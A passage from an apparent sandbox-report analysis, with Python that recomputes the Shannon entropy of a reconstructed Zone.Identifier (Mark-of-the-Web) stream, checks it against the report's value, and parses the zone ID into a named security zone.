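ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}

# Reconstructed from the 26-byte Zone.Identifier entry above
# (Preview: [ZoneTransfer]....ZoneId=0). Whether the two CRLFs sit after
# the header and after the value, or both after the header, is an
# assumption; both layouts contain the same bytes, so the histogram-based
# entropy is the same either way.
ZONE_IDENTIFIER = b"[ZoneTransfer]\r\nZoneId=0\r\n"
REPORTED_ENTROPY = 3.95006375643621   # 'Entropy (8bit)' from that entry


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the quantity the report labels
    'Entropy (8bit)': 0.0 for a constant file, 8.0 for uniformly
    distributed bytes, and just under 8 for compressed or encrypted
    content (the cached .xlsx above, a ZIP container, scores 7.94)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def matches_report(data: bytes, reported: float, tol: float = 1e-6) -> bool:
    """True when the locally computed entropy agrees with the report's value:
    a cheap check that the bytes you hold are the bytes the sandbox saw."""
    return abs(shannon_entropy(data) - reported) < tol


def parse_zone_identifier(data: bytes) -> dict:
    """Parse a Mark-of-the-Web stream ('<file>:Zone.Identifier'). ZoneId 3
    (Internet) is what makes Office open a document in Protected View;
    ZoneId 0, as on the cached .tmp above, does not."""
    fields, section = {}, None
    for raw in data.decode("utf-8", errors="replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    zone_id = int(fields["ZoneId"]) if fields.get("ZoneId", "").isdigit() else None
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "unknown"),
        "fields": fields,
    }


if __name__ == "__main__":
    print(f"entropy={shannon_entropy(ZONE_IDENTIFIER):.14f} "
          f"reported={REPORTED_ENTROPY} "
          f"match={matches_report(ZONE_IDENTIFIER, REPORTED_ENTROPY)}")
    print(parse_zone_identifier(ZONE_IDENTIFIER))
```

The entropy check only confirms the byte histogram, not the byte order, so it complements the MD5/SHA columns rather than replacing them; its value is that it works on a partial or re-encoded copy where the hashes no longer line up.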